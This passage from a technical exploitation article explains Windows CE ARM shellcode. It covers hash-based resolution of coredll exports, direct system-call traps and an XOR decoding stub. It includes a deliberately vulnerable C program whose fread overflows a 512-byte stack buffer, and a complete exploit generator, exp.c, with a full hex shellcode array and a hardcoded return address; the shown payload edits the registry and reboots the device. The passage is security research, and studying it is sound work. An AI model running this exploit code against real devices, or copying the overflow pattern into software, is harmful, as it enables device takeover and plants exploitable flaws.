    mov     r1, #0
    mov     r2, #0
    mov     r3, #0
    mov     lr, pc
    ldr     pc, [r8, #-16]          ; KernelIoControl

; basic wide string compare
wstrcmp   PROC
wstrcmp_iterate
    ldrh    r2, [r0], #2
    ldrh    r3, [r1], #2

    cmp     r2, #0
    cmpeq   r3, #0
    moveq   pc, lr

    cmp     r2, r3
    beq     wstrcmp_iterate

    mov     pc, lr
    ENDP

; output:
;  r0 - coredll base addr
;  r1 - export section addr
get_export_section   PROC
    mov     r11, lr
    adr     r4, kd
    ldr     r4, [r4]
    ;ldr     r4, =0xffffc800         ; KDataStruct
    ldr     r5, =0x324              ; aInfo[KINX_MODULES]

    add     r5, r4, r5
    ldr     r5, [r5]

    ; r5 now points to first module

    mov     r6, r5
    mov     r7, #0

iterate
    ldr     r0, [r6, #8]            ; get dll name
    adr     r1, coredll
    bl      wstrcmp                 ; compare with coredll.dll

    ldreq   r7, [r6, #0x7c]         ; get dll base
    ldreq   r8, [r6, #0x8c]         ; get export section rva

    add     r9, r7, r8
    beq     got_coredllbase         ; is it what we're looking for?

    ldr     r6, [r6, #4]
    cmp     r6, #0
    cmpne   r6, r5
    bne     iterate                 ; nope, go on

got_coredllbase
    mov     r0, r7
    add     r1, r8, r7              ; yep, we've got imagebase
                                    ; and export section pointer

    mov     pc, r11
    ENDP

; r0 - coredll base addr
; r1 - export section addr
; r2 - number of functions to resolve
find_func   PROC
    adr     r8, fn
find_func_loop
    ldr     r4, [r1, #0x20]         ; AddressOfNames
    add     r4, r4, r0

    mov     r6, #0                  ; counter

find_start
    ldr     r7, [r4], #4
    add     r7, r7, r0              ; function name pointer
    ;mov     r8, r2                  ; find function name

    mov     r10, #0
hash_loop
    ldrb    r9, [r7], #1
    cmp     r9, #0
    beq     hash_end
    add     r10, r9, r10, ROR #7
    b       hash_loop

hash_end
    ldr     r9, [r8]
    cmp     r10, r9                 ; compare the hash
    addne   r6, r6, #1
    bne     find_start

    ldr     r5, [r1, #0x24]         ; AddressOfNameOrdinals
    add     r5, r5, r0
    add     r6, r6, r6
    ldrh    r9, [r5, r6]            ; Ordinals
    ldr     r5, [r1, #0x1c]         ; AddressOfFunctions
    add     r5, r5, r0
    ldr     r9, [r5, r9, LSL #2]    ; function address rva
    add     r9, r9, r0              ; function address

    str     r9, [r8], #4
    subs    r2, r2, #1
    bne     find_func_loop

    mov     pc, lr
    ENDP

kd  DCB     0x00, 0xc8, 0xff, 0xff  ; 0xffffc800
sf  DCB     0x3c, 0x00, 0x01, 0x01  ; 0x0101003c

fn  DCB     0xe7, 0x9d, 0x3a, 0x28  ; KernelIoControl
    DCB     0x51, 0xdf, 0xf7, 0x0b  ; RegOpenKeyExW
    DCB     0xc0, 0xfe, 0xc0, 0xd8  ; RegSetValueExW
    DCB     0x83, 0x17, 0x51, 0x0e  ; RegCloseKey

key DCB     "S", 0x0, "O", 0x0, "F", 0x0, "T", 0x0, "W", 0x0, "A", 0x0, "R", 0x0, "E", 0x0
    DCB     "\\", 0x0, "\\", 0x0, "W", 0x0, "i", 0x0, "d", 0x0, "c", 0x0, "o", 0x0, "m", 0x0
    DCB     "m", 0x0, "\\", 0x0, "\\", 0x0, "B", 0x0, "t", 0x0, "C", 0x0, "o", 0x0, "n", 0x0
    DCB     "f", 0x0, "i", 0x0, "g", 0x0, "\\", 0x0, "\\", 0x0, "G", 0x0, "e", 0x0, "n", 0x0
    DCB     "e", 0x0, "r", 0x0, "a", 0x0, "l", 0x0, 0x0, 0x0, 0x0, 0x0

val DCB     "S", 0x0, "t", 0x0, "a", 0x0, "c", 0x0, "k", 0x0, "M", 0x0, "o", 0x0, "d", 0x0
    DCB     "e", 0x0, 0x0, 0x0

coredll DCB "c", 0x0, "o", 0x0, "r", 0x0, "e", 0x0, "d", 0x0, "l", 0x0, "l", 0x0
        DCB ".", 0x0, "d", 0x0, "l", 0x0, "l", 0x0, 0x0, 0x0

    ALIGN   4

    LTORG
test_end

WinMainCRTStartup PROC
    b       test_code_start
    ENDP

    END

This shellcode consists of three parts. First, it calls the
get_export_section function to obtain the virtual base address of coredll
and the address of its export table; these are returned in r0 and r1.
Second, it calls the find_func function to look up the API addresses
through the IMAGE_EXPORT_DIRECTORY structure, storing each address over
its own hash value. The last part is the payload itself: it sets the
registry value HKLM\SOFTWARE\Widcomm\BtConfig\General\StackMode to 1 and
then uses KernelIoControl to soft-reset the system.

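The lookup that find_func performs can be sketched in C. This is only an
illustration of the export directory walk under my own assumptions: the
names find_export_rva, name_hash and build_demo_image are hypothetical,
the image is a small fake buffer rather than coredll, and, unlike the
assembly, the loop stops after NumberOfNames entries.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Field offsets inside IMAGE_EXPORT_DIRECTORY, as used by find_func. */
enum {
    EXP_NUMBER_OF_NAMES  = 0x18,
    EXP_ADDRESS_OF_FUNCS = 0x1c,
    EXP_ADDRESS_OF_NAMES = 0x20,
    EXP_ADDRESS_OF_ORDS  = 0x24
};

/* Read a little-endian 32-bit value. */
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Write a little-endian 32-bit value. */
static void wr32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;
    p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);
    p[3] = (uint8_t)(v >> 24);
}

/* hash = ch + ROR(hash, 7), the same arithmetic as hash_loop. */
uint32_t name_hash(const char *s)
{
    uint32_t h = 0;

    while (*s != '\0')
        h = (uint32_t)(unsigned char)*s++ + ((h >> 7) | (h << 25));
    return h;
}

/*
 * Walk the export directory at image + dir_rva and return the RVA of the
 * export whose name hashes to `hash`, or 0 if no name matches.
 */
uint32_t find_export_rva(const uint8_t *image, uint32_t dir_rva,
                         uint32_t hash)
{
    const uint8_t *dir, *names, *ords, *funcs;
    uint32_t i, count;

    assert(image != 0);
    dir   = image + dir_rva;
    names = image + rd32(dir + EXP_ADDRESS_OF_NAMES);
    ords  = image + rd32(dir + EXP_ADDRESS_OF_ORDS);
    funcs = image + rd32(dir + EXP_ADDRESS_OF_FUNCS);
    count = rd32(dir + EXP_NUMBER_OF_NAMES);

    for (i = 0; i < count; i++) {
        const char *name = (const char *)image + rd32(names + 4 * i);

        if (name_hash(name) == hash) {
            /* The name index selects a 16-bit ordinal, which in turn
             * indexes the function RVA table. */
            uint32_t ord = (uint32_t)ords[2 * i] |
                           ((uint32_t)ords[2 * i + 1] << 8);
            return rd32(funcs + 4 * ord);
        }
    }
    return 0;
}

/* Tiny fake image with two exports, for demonstration only. */
void build_demo_image(uint8_t img[128])
{
    memset(img, 0, 128);
    wr32(img + 0x10 + EXP_NUMBER_OF_NAMES, 2);
    wr32(img + 0x10 + EXP_ADDRESS_OF_FUNCS, 0x40);
    wr32(img + 0x10 + EXP_ADDRESS_OF_NAMES, 0x50);
    wr32(img + 0x10 + EXP_ADDRESS_OF_ORDS, 0x60);
    wr32(img + 0x40, 0x1111);       /* function table entry 0 */
    wr32(img + 0x44, 0x2222);       /* function table entry 1 */
    wr32(img + 0x50, 0x70);         /* name 0 -> "Alpha" */
    wr32(img + 0x54, 0x78);         /* name 1 -> "Beta"  */
    img[0x60] = 1;                  /* "Alpha" uses function entry 1 */
    img[0x62] = 0;                  /* "Beta" uses function entry 0  */
    memcpy(img + 0x70, "Alpha", 6);
    memcpy(img + 0x78, "Beta", 5);
}
```

The shellcode adds the image base to the returned RVA to get the callable
address, which is what "add r9, r9, r0" does.
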
Windows CE.NET provides BthGetMode and BthSetMode to get and set the
Bluetooth state. But HP iPAQs use the Widcomm stack, which has its own
API, so BthSetMode can't turn on Bluetooth on an iPAQ. Well, there is
another way to turn on Bluetooth on iPAQs (my PDA is an HP1940): just set
HKLM\SOFTWARE\Widcomm\BtConfig\General\StackMode to 1 and reset the PDA;
Bluetooth will be on after the system restarts. This method is not
pretty, but it works.

Well, let's look at the get_export_section function. Why did I comment
out the "ldr r4, =0xffffc800" instruction? We must pay attention to the
ARM assembler's LDR pseudo-instruction. It loads a register with a 32-bit
constant or an address. The instruction "ldr r4, =0xffffc800" shows up as
"ldr r4, [pc, #0x108]" in the EVC debugger: the constant cannot be encoded
as an immediate, so the assembler stores it in a literal pool and loads it
relative to pc. What r4 receives therefore depends on the layout of the
assembled program, so r4 won't get the 0xffffc800 value in the shellcode
and the shellcode will fail. The instruction "ldr r5, =0x324" becomes
"mov r5, #0xC9, 30" in the EVC debugger, which is fine when the shellcode
is executed. The simple solution is to embed the large constant in the
shellcode itself, use the ADR pseudo-instruction to load its address into
a register, and then read the value from memory.

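Whether a constant fits into a single MOV can be checked ahead of time.
The sketch below assumes the usual ARM rule that a data-processing
immediate is an 8-bit value rotated right by an even amount, and that an
assembler may fall back to MVN before using a literal pool; the function
names are mine and are not part of any toolchain.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Try to express `value` as an ARM data-processing immediate:
 * an 8-bit constant rotated right by an even amount (0..30).
 * Returns 1 and fills imm8/rot on success, 0 otherwise.
 * arm_imm_encode is a hypothetical helper name for this sketch.
 */
int arm_imm_encode(uint32_t value, unsigned *imm8, unsigned *rot)
{
    unsigned r;

    assert(imm8 != 0 && rot != 0);
    for (r = 0; r < 32; r += 2) {
        /* Undo "rotate right by r" by rotating left by r. */
        uint32_t v = r ? (value << r) | (value >> (32 - r)) : value;

        if (v <= 0xffu) {
            *imm8 = (unsigned)v;
            *rot = r;
            return 1;
        }
    }
    return 0;
}

/* A constant needs a literal pool when neither MOV nor MVN encodes it. */
int needs_literal_pool(uint32_t value)
{
    unsigned imm8, rot;

    return !arm_imm_encode(value, &imm8, &rot) &&
           !arm_imm_encode(~value, &imm8, &rot);
}
```

For 0x324 this yields imm8 = 0xC9 and rot = 30, the "mov r5, #0xC9, 30"
shown by the debugger, while 0xffffc800 needs a literal pool and is the
kind of constant that has to be embedded by hand.
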
To save space, we can hash the API names: each API name is reduced to a
4-byte hash. The hash technique comes from LSD's Win32 Assembly
Components.

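The hash values in the fn table can be produced off-line with a few lines
of C that repeat the arithmetic of hash_loop ("add r10, r9, r10, ROR #7").
A minimal sketch; ce_hash is a name I made up for it:

```c
#include <assert.h>
#include <stdint.h>

/* Rotate a 32-bit value right by n bits (0 < n < 32). */
static uint32_t ror32(uint32_t v, unsigned n)
{
    return (v >> n) | (v << (32 - n));
}

/*
 * Same arithmetic as the hash_loop in find_func:
 *     hash = ch + ROR(hash, 7)      for every byte of the ASCII name
 * ce_hash is a hypothetical helper name used only in this sketch.
 */
uint32_t ce_hash(const char *name)
{
    uint32_t hash = 0;

    assert(name != 0);
    while (*name != '\0')
        hash = (uint32_t)(unsigned char)*name++ + ror32(hash, 7);
    return hash;
}
```

ce_hash("KernelIoControl") gives 0x283A9DE7, which the fn table stores in
little-endian order as the bytes 0xe7, 0x9d, 0x3a, 0x28.
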
Build it as follows:

    armasm test.asm
    link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj

You must install the EVC environment first. After this, we can extract
the necessary opcodes with the EVC debugger, IDA Pro, or a hex editor.


--[ 8 - System Call

First, let's look at the implementation of an API in coredll.dll:

.text:01F75040         EXPORT PowerOffSystem
.text:01F75040 PowerOffSystem          ; CODE XREF: SetSystemPowerState+58p
.text:01F75040         STMFD   SP!, {R4,R5,LR}
.text:01F75044         LDR     R5, =0xFFFFC800
.text:01F75048         LDR     R4, =unk_1FC6760
.text:01F7504C         LDR     R0, [R5]            ; UTlsPtr
.text:01F75050         LDR     R1, [R0,#-0x14]     ; KTHRDINFO
.text:01F75054         TST     R1, #1
.text:01F75058         LDRNE   R0, [R4]            ; 0x8004B138 ppfnMethods
.text:01F7505C         CMPNE   R0, #0
.text:01F75060         LDRNE   R1, [R0,#0x13C]     ; 0x8006C92C SC_PowerOffSystem
.text:01F75064         LDREQ   R1, =0xF000FEC4     ; trap address of SC_PowerOffSystem
.text:01F75068         MOV     LR, PC
.text:01F7506C         MOV     PC, R1
.text:01F75070         LDR     R3, [R5]
.text:01F75074         LDR     R0, [R3,#-0x14]
.text:01F75078         TST     R0, #1
.text:01F7507C         LDRNE   R0, [R4]
.text:01F75080         CMPNE   R0, #0
.text:01F75084         LDRNE   R0, [R0,#0x25C]     ; SC_KillThreadIfNeeded
.text:01F75088         MOVNE   LR, PC
.text:01F7508C         MOVNE   PC, R0
.text:01F75090         LDMFD   SP!, {R4,R5,PC}
.text:01F75090 ; End of function PowerOffSystem

Stepping through this API, we find that it checks KTHRDINFO first. This
value is initialized in the MDCreateMainThread2 function of
PRIVATE\WINCEOS\COREOS\NK\KERNEL\ARM\mdarm.c:

    ...
    if (kmode || bAllKMode) {
        pTh->ctx.Psr = KERNEL_MODE;
        KTHRDINFO (pTh) |= UTLS_INKMODE;
    } else {
        pTh->ctx.Psr = USER_MODE;
        KTHRDINFO (pTh) &= ~UTLS_INKMODE;
    }
    ...

If the application is in kernel mode, the UTLS_INKMODE bit of this value
is set to 1; otherwise it is 0. All Pocket PC applications run in kernel
mode, so execution continues with "LDRNE R0, [R4]". In my environment, R0
gets 0x8004B138, which is the ppfnMethods pointer of
SystemAPISets[SH_WIN32], and then execution reaches
"LDRNE R1, [R0,#0x13C]". The offset 0x13C (0x13C/4 = 0x4F = 79)
corresponds to an index into Win32Methods, defined in
PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h:

    const PFNVOID Win32Methods[] = {
        ...
        (PFNVOID)SC_PowerOffSystem, // 79
        ...
    };

Well, R1 gets the address of SC_PowerOffSystem, which is implemented in
the kernel. The instruction "LDREQ R1, =0xF000FEC4" has no effect when the
application runs in kernel mode. The address 0xF000FEC4 is the system call
(trap) address used from user mode. Some APIs use the system call
directly, such as SetKMode:

.text:01F756C0         EXPORT SetKMode
.text:01F756C0 SetKMode
.text:01F756C0
.text:01F756C0 var_4   = -4
.text:01F756C0
.text:01F756C0         STR     LR, [SP,#var_4]!
.text:01F756C4         LDR     R1, =0xF000FE50
.text:01F756C8         MOV     LR, PC
.text:01F756CC         MOV     PC, R1
.text:01F756D0         LDMFD   SP!, {PC}

Windows CE doesn't use ARM's SWI instruction to implement system calls; it
does it in a different way. A system call is made by jumping to an invalid
address in the range 0xf0000000 - 0xf0010000, which causes a prefetch
abort. The abort is handled by PrefetchAbort, implemented in armtrap.s.
PrefetchAbort checks the faulting address first: if it is in the trap
area, it uses ObjectCall to locate and execute the system call; otherwise
it calls ProcessPrefAbort to deal with the exception.

The system call address is calculated with this formula:

    0xf0010000-(256*apiset+apinr)*4

The API set handles are defined in PUBLIC\COMMON\SDK\INC\kfuncs.h and
PUBLIC\COMMON\OAK\INC\psyscall.h, and the apinrs are defined in several
files; for example, the SH_WIN32 calls are defined in
PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h.

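The formula and its inverse can be written down in C. This is only a
sketch of the arithmetic; trap_address and trap_decode are names I chose
for illustration and are not kernel symbols, and the real dispatch is done
by PrefetchAbort and ObjectCall.

```c
#include <assert.h>
#include <stdint.h>

#define TRAP_TOP   0xf0010000u   /* upper end of the trap area */
#define TRAP_BASE  0xf0000000u   /* lower end of the trap area */

/* Trap address for method `apinr` of API set `apiset`. */
uint32_t trap_address(uint32_t apiset, uint32_t apinr)
{
    assert(apinr < 256);
    return TRAP_TOP - (256u * apiset + apinr) * 4u;
}

/*
 * Inverse mapping: recover apiset and apinr from a trap address.
 * Returns 0 if addr is not a word-aligned address inside the range
 * 0xf0000000 - 0xf0010000, 1 otherwise.
 */
int trap_decode(uint32_t addr, uint32_t *apiset, uint32_t *apinr)
{
    uint32_t index;

    assert(apiset != 0 && apinr != 0);
    if (addr < TRAP_BASE || addr > TRAP_TOP || (addr & 3u) != 0)
        return 0;
    index = (TRAP_TOP - addr) / 4u;
    *apiset = index / 256u;
    *apinr = index % 256u;
    return 1;
}
```

With apiset 0, apinr 79 gives 0xF000FEC4, the trap address seen in
PowerOffSystem, and decoding the 0xF000FE50 used by SetKMode gives apiset
0 and apinr 108.
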
Well, let's calculate the system call address of KernelIoControl. The
apiset is 0 and the apinr is 99, so the address is
0xf0010000-(256*0+99)*4, which is 0xF000FE74. The following shellcode is
implemented with the system call:

#include "stdafx.h"

int shellcode[] =
{
    0xE59F0014, // ldr r0, [pc, #20]
    0xE59F4014, // ldr r4, [pc, #20]
    0xE3A01000, // mov r1, #0
    0xE3A02000, // mov r2, #0
    0xE3A03000, // mov r3, #0
    0xE1A0E00F, // mov lr, pc
    0xE1A0F004, // mov pc, r4
    0x0101003C, // IOCTL_HAL_REBOOT
    0xF000FE74, // trap address of KernelIoControl
};

int WINAPI WinMain( HINSTANCE hInstance,
                    HINSTANCE hPrevInstance,
                    LPTSTR    lpCmdLine,
                    int       nCmdShow)
{
    ((void (*)(void)) & shellcode)();

    return 0;
}

It works fine, and we don't need to search for API addresses.


--[ 9 - Windows CE Buffer Overflow Exploitation

hello.cpp is the vulnerable demonstration program:

// hello.cpp
//

#include "stdafx.h"

int hello()
{
    FILE * binFileH;
    char binFile[] = "\\binfile";
    char buf[512];

    if ( (binFileH = fopen(binFile, "rb")) == NULL )
    {
        printf("can't open file %s!\n", binFile);
        return 1;
    }

    memset(buf, 0, sizeof(buf));
    // reads up to 1024 bytes into the 512-byte buf: the overflow
    fread(buf, sizeof(char), 1024, binFileH);

    printf("%08x %d\n", &buf, strlen(buf));
    getchar();

    fclose(binFileH);
    return 0;
}

int WINAPI WinMain( HINSTANCE hInstance,
                    HINSTANCE hPrevInstance,
                    LPTSTR    lpCmdLine,
                    int       nCmdShow)
{
    hello();
    return 0;
}

The hello function has a buffer overflow. It uses fread() to read data
from "binfile" in the root directory into the stack variable "buf".
Because it reads up to 1KB, "buf" is overflowed if "binfile" is larger
than 512 bytes.

The printf and getchar calls are just for testing. They have no effect
unless console.dll is in the \Windows directory. The console.dll file
comes from the Windows Mobile Developer Power Toys.

ARM assembly language uses the bl instruction to call a function. Let's
look into the hello function:

6:    int hello()
7:    {
22011000   str       lr, [sp, #-4]!
22011004   sub       sp, sp, #0x89, 30
8:        FILE * binFileH;
9:        char binFile[] = "\\binfile";
...
...
26:   }
220110C4   add       sp, sp, #0x89, 30
220110C8   ldmia     sp!, {pc}

"str lr, [sp, #-4]!" is the first instruction of the hello() function. It
stores the lr register, which contains the return address into hello's
caller, on the stack. The second instruction reserves stack memory for the
local variables. "ldmia sp!, {pc}" is the last instruction of the hello()
function. It loads the saved return address from the stack into the pc
register, and the program continues in the WinMain function. So
overwriting the saved lr on the stack gives us control when the hello
function returns.

The addresses of the variables a program allocates, on both the stack and
the heap, are relative to the slot the process is loaded into. The process
may be loaded into a different slot each time it starts, so the base
address changes. But we know that slot 0 is mapped from the current
process's slot, so the stack address within slot 0 is stable.

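The relation between an address in a process slot and its slot 0 alias is
plain bit arithmetic. The sketch below assumes the 32MB slot size of the
Windows CE memory layout; slot_of and slot0_alias are illustrative names,
and the address 0x2202FC50 used in the note after it is a made-up example,
not a value taken from the debugger.

```c
#include <assert.h>
#include <stdint.h>

#define SLOT_SHIFT 25                          /* 32MB slots: 1 << 25  */
#define SLOT_MASK  ((1u << SLOT_SHIFT) - 1u)   /* offset inside a slot */

/* Slot number of a virtual address in the slot-mapped region. */
uint32_t slot_of(uint32_t addr)
{
    return addr >> SLOT_SHIFT;
}

/* The same location as seen through slot 0 while the process runs. */
uint32_t slot0_alias(uint32_t addr)
{
    return addr & SLOT_MASK;
}
```

The code addresses in the listing above (0x22011000) fall into slot 17. A
stack location at 0x2202FC50 in that slot would also be reachable as
0x0002FC50, and the slot 0 form stays the same whichever slot the process
gets.
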
The following is the exploit for the hello program:

/* exp.c - Windows CE Buffer Overflow Demo
*
*  san@xfocus.org
*/
#include <stdio.h>
#include <string.h>

#define NOP 0xE1A01001  /* mov r1, r1     */
#define LR  0x0002FC50  /* return address */

int shellcode[] =
{
    0xEB000026,
    0xE3A02004,
    0xEB00003A,
    0xE24DDF89,
    0xE28D0008,
    0xE58D0000,
    0xE3A03002,
    0xE3A02000,
    0xE28F1F56,
    0xE3A0010A,
    0xE1A0E00F,
    0xE518F00C,
    0xE3A00001,
    0xE58D000C,
    0xE3A03004,
    0xE58D3004,
    0xE28D100C,
    0xE58D1000,
    0xE28F1F5F,
    0xE59D0008,
    0xE1A0E00F,
    0xE518F008,
    0xE59D0008,
    0xE1A0E00F,
    0xE518F004,
    0xE28F0C01,
    0xE5900000,
    0xE3A01000,
    0xE3A02000,
    0xE3A03000,
    0xE1A0E00F,
    0xE518F010,
    0xE0D020B2,
    0xE0D130B2,
    0xE3520000,
    0x03530000,
    0x01A0F00E,
    0xE1520003,
    0x0AFFFFF8,
    0xE1A0F00E,
    0xE1A0B00E,
    0xE28F40BC,
    0xE5944000,
    0xE3A05FC9,
    0xE0845005,
    0xE5955000,
    0xE1A06005,
    0xE3A07000,
    0xE5960008,
    0xE28F1F45,
    0xEBFFFFEC,
    0x0596707C,
    0x0596808C,
    0xE0879008,
    0x0A000003,
    0xE5966004,
    0xE3560000,
    0x11560005,
    0x1AFFFFF4,
    0xE1A00007,
    0xE0881007,
    0xE1A0F00B,
    0xE28F8070,
    0xE5914020,
    0xE0844000,
    0xE3A06000,
    0xE4947004,
    0xE0877000,
    0xE3A0A000,
    0xE4D79001,
    0xE3590000,
    0x0A000001,
    0xE089A3EA,
    0xEAFFFFFA,
    0xE5989000,
    0xE15A0009,
    0x12866001,
    0x1AFFFFF3,
    0xE5915024,
    0xE0855000,
    0xE0866006,
    0xE19590B6,
    0xE591501C,
    0xE0855000,
    0xE7959109,
    0xE0899000,
    0xE4889004,
    0xE2522001,
    0x1AFFFFE5,
    0xE1A0F00E,
    0xFFFFC800,
    0x0101003C,
    0x283A9DE7,
    0x0BF7DF51,
    0xD8C0FEC0,
    0x0E511783,
    0x004F0053,
    0x00540046,
    0x00410057,
    0x00450052,
    0x005C005C,
    0x00690057,
    0x00630064,
    0x006D006F,
    0x005C006D,
    0x0042005C,
    0x00430074,
    0x006E006F,
    0x00690066,
    0x005C0067,
    0x0047005C,
    0x006E0065,
    0x00720065,
    0x006C0061,
    0x00000000,
    0x00740053,
    0x00630061,
    0x004D006B,
    0x0064006F,
    0x00000065,
    0x006F0063,
    0x00650072,
    0x006C0064,
    0x002E006C,
    0x006C0064,
    0x0000006C,
};

/* stores a 32-bit value into the buffer in little-endian byte order */
char* put_long(char* ptr, long value)
{
    *ptr++ = (char) ((value >> 0) & 0xff);
    *ptr++ = (char) ((value >> 8) & 0xff);
    *ptr++ = (char) ((value >> 16) & 0xff);
    *ptr++ = (char) ((value >> 24) & 0xff);

    return ptr;
}

int main()
{
    FILE * binFileH;
    char binFile[] = "binfile";
    char buf[544];
    char *ptr;
    int i;

    if ( (binFileH = fopen(binFile, "wb")) == NULL )
    {
        printf("can't create file %s!\n", binFile);
        return 1;
    }

    memset(buf, 0, sizeof(buf));
    ptr = buf;

    for (i = 0; i < 4; i++) {
        ptr = put_long(ptr, NOP);
    }
    memcpy(buf+16, shellcode, sizeof(shellcode));
    put_long(ptr-16+540, LR);   /* return address slot at buf+540 */

    fwrite(buf, sizeof(char), 544, binFileH);
    fclose(binFileH);
    return 0;
}

We choose a stack address in slot 0 that points to our shellcode; it
overwrites the return address stored on the stack. We could also use a
jump address in the virtual memory space of the process instead. This
exploit produces a "binfile" that overflows the "buf" variable and the
return address stored on the stack.

After binfile is copied to the PDA, running the hello program restarts
the PDA with Bluetooth turned on. That means the hello program jumped to
our shellcode.

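The layout that exp.c writes (NOPs, shellcode, zero padding, return
address at offset 540) can be expressed as one helper that also checks
that the pieces fit in front of the return-address slot. This is a sketch
with names of my own (build_payload, store_le32); it only restates what
exp.c already does.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define ARM_NOP 0xE1A01001u   /* mov r1, r1, as in exp.c */

/* Store a 32-bit value in little-endian byte order. */
static void store_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/*
 * Lay out: nop_words NOPs | code | zero padding | ret (at ret_off).
 * Returns the total length (ret_off + 4), or 0 if the pieces do not fit
 * in front of the return-address slot or in the output buffer.
 * build_payload and its parameters are illustrative names only.
 */
size_t build_payload(unsigned char *out, size_t out_size,
                     const unsigned char *code, size_t code_len,
                     size_t nop_words, size_t ret_off, uint32_t ret)
{
    size_t i, sled = nop_words * 4;

    assert(out != 0 && code != 0);
    if (ret_off % 4 != 0 || ret_off + 4 > out_size ||
        sled + code_len > ret_off)
        return 0;

    memset(out, 0, ret_off + 4);
    for (i = 0; i < nop_words; i++)
        store_le32(out + 4 * i, ARM_NOP);
    memcpy(out + sled, code, code_len);
    store_le32(out + ret_off, ret);
    return ret_off + 4;
}
```

With 4 NOP words, the 504-byte shellcode array, ret_off 540 and the LR
value 0x0002FC50, this produces the same 544 bytes as exp.c.
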
Then I tried another way to construct the exploit string, as follows:

    pad...pad|return address|nop...nop...shellcode

This exploit produces a 1KB "binfile", but the PDA freezes when the hello
program is executed. It was confusing. I think the stack of Windows CE may
be small and the overflow string destroyed the 2KB guard at the top of the
stack. It freezes when the program calls an API after the overflow has
occurred. So we must keep the characteristics of the stack in mind when
writing exploits for Windows CE.

EVC has some bugs that make debugging difficult. First, EVC writes some
arbitrary data to the stack when the stack is released at the end of a
function, so the shellcode may be modified. Second, the instruction at a
breakpoint may be changed to 0xE6000010 in EVC while debugging. Another
bug is funny: the debugger raises no error when single-stepping over a
write to a .text address, but it catches an access violation exception
when the code is run directly.


--[ 10 - About Decoding Shellcode

The shellcode discussed above is a proof-of-concept shellcode that
contains lots of zero bytes. It executes correctly in this demonstration
program, but other vulnerable programs may filter special characters
before the buffer overflow occurs. For example, if the overflow happens
through strcpy, the shellcode is cut at the first zero byte.

It is difficult and inconvenient to write API-searching shellcode that
avoids special characters. So we consider decoding shellcode: the real
shellcode is stored in an encoded form that avoids the special characters,
and a small decoder restores it at run time. This makes the real shellcode
more universal.

The newer ARM processors (such as arm9 and arm10) have a Harvard
architecture with separate instruction and data caches. This feature
improves the performance of the processor, and most RISC processors have
it. But it makes self-modifying code hard to implement, because whether
the modified instructions are actually executed depends on the caches and
on the processor implementation.

Let's look at the following code first:

#include "stdafx.h"

int weird[] =
{
    0xE3A01099, // mov r1, #0x99

    0xE5CF1020, // strb r1, [pc, #0x20]
    0xE5CF1020, // strb r1, [pc, #0x20]
    0xE5CF1020, // strb r1, [pc, #0x20]
    0xE5CF1020, // strb r1, [pc, #0x20]

    0xE1A01001, // mov r1, r1 ; pad
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,

    0xE3A04001, // mov r4, #0x1
    0xE3A03001, // mov r3, #0x1
    0xE3A02001, // mov r2, #0x1
    0xE3A01001, // mov r1, #0x1
    0xE6000010, // breakpoint
};

int WINAPI WinMain( HINSTANCE hInstance,
                    HINSTANCE hPrevInstance,
                    LPTSTR    lpCmdLine,
                    int       nCmdShow)
{
    ((void (*)(void)) & weird)();

    return 0;
}

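All four strb instructions in the listing above use the same offset yet
hit four different mov instructions, because in ARM state pc reads as the
address of the current instruction plus 8. A small sketch of that
arithmetic, with helper names of my own:

```c
#include <assert.h>
#include <stdint.h>

/*
 * In ARM state, reading pc yields the address of the current instruction
 * plus 8. For "ldr/str Rd, [pc, #imm]" the accessed address is therefore
 * instr_addr + 8 + imm. pc_rel_target is an illustrative helper name.
 */
uint32_t pc_rel_target(uint32_t instr_addr, uint32_t imm)
{
    return instr_addr + 8u + imm;
}

/* Offset field needed so the instruction at instr_addr reaches target. */
int pc_rel_offset(uint32_t instr_addr, uint32_t target, uint32_t *imm)
{
    assert(imm != 0);
    if (target < instr_addr + 8u || target - (instr_addr + 8u) > 0xfffu)
        return 0;           /* only the positive 12-bit form is handled */
    *imm = target - (instr_addr + 8u);
    return 1;
}
```

Taking offsets from the start of the array, the strb at 0x04 writes to
0x2C and the one at 0x10 writes to 0x38. These are the low bytes of the
four mov instructions (the array is little-endian), which hold their
immediate values.
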
The four strb instructions change the immediate value of the mov
instructions below them to 0x99. When this code is executed directly in
the EVC debugger, it stops at the inserted breakpoint. On the S3C2410,
which is an arm9 core processor, the r1-r4 registers get 0x99. When I
tested this code on my friend's PDA, which has an Intel XScale processor,
more nop padding was needed after the modification for r1-r4 to get 0x99.
I think the reason may be the pipeline depth: the arm9 has a 5-stage
pipeline and the arm10 has a 6-stage pipeline. Well, I changed it to
another method:

    0xE28F3053, // add r3, pc, #0x53

    0xE3A01010, // mov r1, #0x10
    0xE7D32001, // ldrb r2, [r3, +r1]
    0xE2222088, // eor r2, r2, #0x88
    0xE7C32001, // strb r2, [r3, +r1]
    0xE2511001, // subs r1, r1, #1
    0x1AFFFFFA, // bne 28011008

    //0xE1A0100F, // mov r1, pc
    //0xE3A02020, // mov r2, #0x20
    //0xE3A03D05, // mov r3, #5, 26
    //0xEE071F3A, // mcr p15, 0, r1, c7, c10, 1 ; clean each D-cache line
    //0xE0811002, // add r1, r1, r2
    //0xE0533002, // subs r3, r3, r2
    //0xCAFFFFFB, // bgt |weird+28h (30013058)|
    //0xE0211001, // eor r1, r1, r1
    //0xEE071F9A, // mcr p15, 0, r1, c7, c10, 4 ; drain write buffer
    //0xEE071F15, // mcr p15, 0, r1, c7, c5, 0 ; flush the icache
    0xE1A01001, // mov r1, r1 ; pad
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
